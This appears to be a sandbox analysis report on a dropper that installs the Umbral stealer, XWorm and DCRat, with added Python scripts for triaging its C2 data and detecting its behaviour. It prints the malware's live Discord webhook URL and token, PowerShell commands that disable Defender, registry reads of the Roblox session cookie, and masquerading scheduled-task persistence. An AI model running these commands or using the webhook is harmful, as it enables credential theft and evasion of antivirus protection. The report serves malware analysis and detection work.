Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags
    arch:x64
    arch:x86
    image:win10v2004-20240508-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    17/05/2024, 20:41 UTC

General

  • Target

    3969991942bb5b6130977411ae258ab8.exe

  • Size

    19.8MB

  • MD5

    3969991942bb5b6130977411ae258ab8

  • SHA1

    c391e670488d73dc79c2acfab1e845d9c3e5227e

  • SHA256

    aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28

  • SHA512

    ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a

  • SSDEEP

    393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Extracted

Family

xworm

C2

127.0.0.1:30683

operating-niger.gl.at.ply.gg:30683:30683

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe
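The two C2 entries above deserve a few minutes of triage before they go into a report: the Discord webhook URL is a bearer credential whose numeric ID is a snowflake that encodes its own creation time, and the XWorm list mixes a loopback placeholder with a playit.gg tunnel hostname. The following Python is an added example written for this page, not code from tria.ge or from either malware family. The config values and the submission time are copied from this report; the list of tunnel-provider suffixes is an assumption to tune for your own environment.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Values copied from the extracted config in this report; the submission time
# comes from the Analysis section.
CONFIG = {
    "umbral": {"c2": [
        "https://discord.com/api/webhooks/1221847080373584144/"
        "7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ",
    ]},
    "xworm": {"c2": ["127.0.0.1:30683", "operating-niger.gl.at.ply.gg:30683:30683"],
              "install_directory": "%AppData%", "install_file": "XClient.exe"},
}
SUBMITTED_AT = datetime(2024, 5, 17, 20, 41, tzinfo=timezone.utc)

DISCORD_EPOCH_MS = 1_420_070_400_000  # 2015-01-01T00:00:00Z, the epoch Discord snowflake IDs count from
WEBHOOK_RE = re.compile(r"https://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([\w-]+)")
# Assumption: a short, editable list of reverse-tunnel providers that RAT operators use to front listeners.
TUNNEL_SUFFIXES = (".ply.gg", ".ngrok.io", ".ngrok-free.app", ".serveo.net")


@dataclass(frozen=True)
class Webhook:
    id: int
    token: str
    created_at: datetime

    def redacted(self):
        """Form that is safe to paste into a shared report: the ID identifies the webhook, the token stays private."""
        return (f"discord webhook {self.id} (token {self.token[:4]}...{self.token[-4:]}, "
                f"created {self.created_at:%Y-%m-%d %H:%M}Z)")


def snowflake_time(snowflake):
    """Creation time encoded in a Discord snowflake: the top bits are milliseconds since the Discord epoch."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def parse_webhook(url):
    """Split a Discord webhook URL into ID, token and creation time; None if it is not one."""
    m = WEBHOOK_RE.fullmatch(url.strip())
    if not m:
        return None
    webhook_id = int(m.group(1))
    return Webhook(webhook_id, m.group(2), snowflake_time(webhook_id))


def parse_xworm_c2(entry):
    """Split XWorm's 'host:port' / 'host:port:port' notation and classify the host."""
    host, *ports = entry.strip().split(":")
    host = host.lower()
    port = int(ports[0]) if ports and ports[0].isdigit() else None
    return {
        "host": host,
        "port": port,
        "loopback": host == "localhost" or host.startswith("127."),
        "tunnel": host.endswith(TUNNEL_SUFFIXES),
    }


def triage(config, observed_at):
    """Reduce the extracted C2 material to what a responder acts on first."""
    report = {"webhooks": [], "listeners": []}
    for url in config.get("umbral", {}).get("c2", []):
        wh = parse_webhook(url)
        if wh:
            report["webhooks"].append({"summary": wh.redacted(),
                                       "age_days": (observed_at - wh.created_at).days})
    for entry in config.get("xworm", {}).get("c2", []):
        c2 = parse_xworm_c2(entry)
        if c2["loopback"]:
            c2["note"] = "placeholder, ignore"
        elif c2["tunnel"]:
            c2["note"] = "tunnel provider: block by hostname, the backend IP changes"
        else:
            c2["note"] = "direct listener"
        report["listeners"].append(c2)
    return report


if __name__ == "__main__":
    for section, items in triage(CONFIG, SUBMITTED_AT).items():
        print(section)
        for item in items:
            print("  ", item)
```

The creation time recovered from the snowflake (2024-03-25 15:44 UTC for this webhook, 53 days before submission) dates the operator's infrastructure independently of when the sample surfaced. The redacted form is what belongs in a shared report: anyone holding the full URL can post to, read or delete the webhook.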

Signatures

  • DcRat

    DarkCrystal (DCRat) is a .NET RAT, active since June 2019, capable of loading additional plugins.

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral is an open-source modular stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 36 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe
    "C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
      "C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Users\Admin\AppData\Roaming\Nursultan.exe
        "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:5016
      • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
        "C:\Users\Admin\AppData\Roaming\LoaderMas.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
    • C:\Users\Admin\AppData\Roaming\t.bat
      "C:\Users\Admin\AppData\Roaming\t.bat"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\perfdhcpSvc\Chainprovider.exe
            "C:\perfdhcpSvc\Chainprovider.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1760
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                PID:1168
              • C:\perfdhcpSvc\StartMenuExperienceHost.exe
                "C:\perfdhcpSvc\StartMenuExperienceHost.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:4932
    • C:\Users\Admin\AppData\Roaming\Umbral.exe
      "C:\Users\Admin\AppData\Roaming\Umbral.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3768
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2288
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
        3⤵
        • Views/modifies file attributes
        PID:4464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4324
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1272
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:3704
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:4776
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:960
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:2068
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • Runs ping.exe
          PID:3740
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\perfdhcpSvc\System.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1272
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1624
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4592
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\conhost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1096
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:452
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4908
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1144
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4040
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3304
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Nurik\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1368
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2220
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2900
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4956
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3368
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:748
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4840
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:672
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3240
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4220
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:840
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4964
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4476
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2896
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4488
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Nurik\RuntimeBroker.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:5100
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:3772
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4932
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1584
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:460
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1144
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:1172
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4776
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2888
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:820
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:4792
  • C:\Windows\system32\schtasks.exe
    schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
    1⤵
    • Process spawned unexpected child process
    • Creates scheduled task(s)
    PID:2900

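The process tree above carries the three things a detection engineer would want to pull out of this report: Defender tampering through Add-MpPreference/Set-MpPreference, scheduled tasks whose target borrows a Windows system-process name but lives outside that process's real directory, and the attrib +h +s / ping && del cleanup around Umbral.exe. The following Python is an added example, not tria.ge code; it runs those checks over command lines copied from this report plus one constructed benign scheduled task as a negative control. The table of genuine binary locations is a coarse assumption and should be tuned to your own baseline.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Command lines copied from the process tree in this report, plus one
# constructed benign scheduled task (the last line) as a negative control.
SAMPLE_CMDLINES = [line for line in r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /f
"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe" /f
""".splitlines() if line.strip()]


@dataclass(frozen=True)
class Finding:
    tactic: str
    detail: str
    cmdline: str


# Assumption: where each impersonated Windows binary genuinely lives (lower case,
# forward slashes). Deliberately coarse; tune to your own baseline.
GENUINE_LOCATIONS = {
    "lsass.exe": ("c:/windows/system32/",),
    "csrss.exe": ("c:/windows/system32/",),
    "conhost.exe": ("c:/windows/system32/",),
    "runtimebroker.exe": ("c:/windows/system32/",),
    "wmiprvse.exe": ("c:/windows/system32/wbem/", "c:/windows/syswow64/wbem/"),
    "startmenuexperiencehost.exe": ("c:/windows/systemapps/",),
    "officeclicktorun.exe": ("c:/program files/common files/microsoft shared/clicktorun/",),
    "system.exe": (),  # the real "System" process has no on-disk image at all
}

EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
DISABLE_RE = re.compile(
    r"-(Disable\w+\s+\$true|MAPSReporting\s+Disabled|SubmitSamplesConsent\s+(?:NeverSend|2)\b)", re.I)
SCHTASKS_RE = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b", re.I)


def defender_tamper(cmd):
    """Defender exclusions and feature disables on one command line (T1562.001)."""
    out = []
    for kind, sq, dq, bare in EXCLUSION_RE.findall(cmd):
        out.append(Finding("defender-exclusion", f"{kind}={sq or dq or bare}", cmd))
    if re.search(r"Set-MpPreference", cmd, re.I):
        for switch in DISABLE_RE.findall(cmd):
            out.append(Finding("defender-disable", " ".join(switch.split()), cmd))
    return out


def parse_schtasks(cmd):
    """Return the interesting switches of a 'schtasks /create' line, or None for anything else."""
    if not SCHTASKS_RE.search(cmd):
        return None

    def switch(name):
        m = re.search(r"/%s\s+(\"[^\"]*\"|'[^']*'|\S+)" % name, cmd, re.I)
        return m.group(1).strip("\"'") if m else None  # /tr values here are wrapped as "'path'"

    return {"name": switch("tn"), "target": switch("tr"), "schedule": switch("sc"),
            "modifier": switch("mo"), "runlevel": switch("rl")}


def masquerading_task(cmd):
    """Task whose target borrows a system-process name outside its real directory (T1036.005 via T1053.005)."""
    task = parse_schtasks(cmd)
    if not task or not task["target"]:
        return []
    normalized = task["target"].lower().replace("\\", "/")
    genuine = GENUINE_LOCATIONS.get(normalized.rsplit("/", 1)[-1])
    if genuine is None or any(normalized.startswith(p) for p in genuine):
        return []
    detail = (f"task {task['name']!r} runs {task['target']} "
              f"(sc={task['schedule']} mo={task['modifier']} rl={task['runlevel']})")
    return [Finding("masquerading-scheduled-task", detail, cmd)]


def hide_or_self_delete(cmd):
    """attrib +h +s on a dropped file, and the ping-delay-then-del self-removal idiom."""
    out = []
    if re.search(r"\battrib(?:\.exe)?\"?\s+(?=.*\+h\b)(?=.*\+s\b)", cmd, re.I):
        out.append(Finding("hide-file", "attrib +h +s", cmd))
    if re.search(r"\bping\s+\S+.*&&\s*del\b", cmd, re.I):
        out.append(Finding("self-delete", "ping delay then del", cmd))
    return out


DETECTORS = (defender_tamper, masquerading_task, hide_or_self_delete)


def scan(cmdlines):
    return [f for cmd in cmdlines for detector in DETECTORS for f in detector(cmd)]


def summarize(findings):
    return Counter(f.tactic for f in findings)


if __name__ == "__main__":
    hits = scan(SAMPLE_CMDLINES)
    for f in hits:
        print(f"[{f.tactic}] {f.detail}")
    print(dict(summarize(hits)))
```

Run against the lines from this report the scan yields one exclusion, seven Defender feature disables from the single Set-MpPreference line, two masquerading tasks (lsass.exe under IdentityCRL, StartMenuExperienceHost.exe under perfdhcpSvc), one hide and one self-delete, and nothing for the benign control task. The same three detectors map directly onto the process-creation events (Sysmon ID 1 or Security 4688 with command-line auditing) that an EDR or SIEM already collects.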
        Network

        • flag-us
          DNS
          154.239.44.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          154.239.44.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          105.83.221.88.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          105.83.221.88.in-addr.arpa
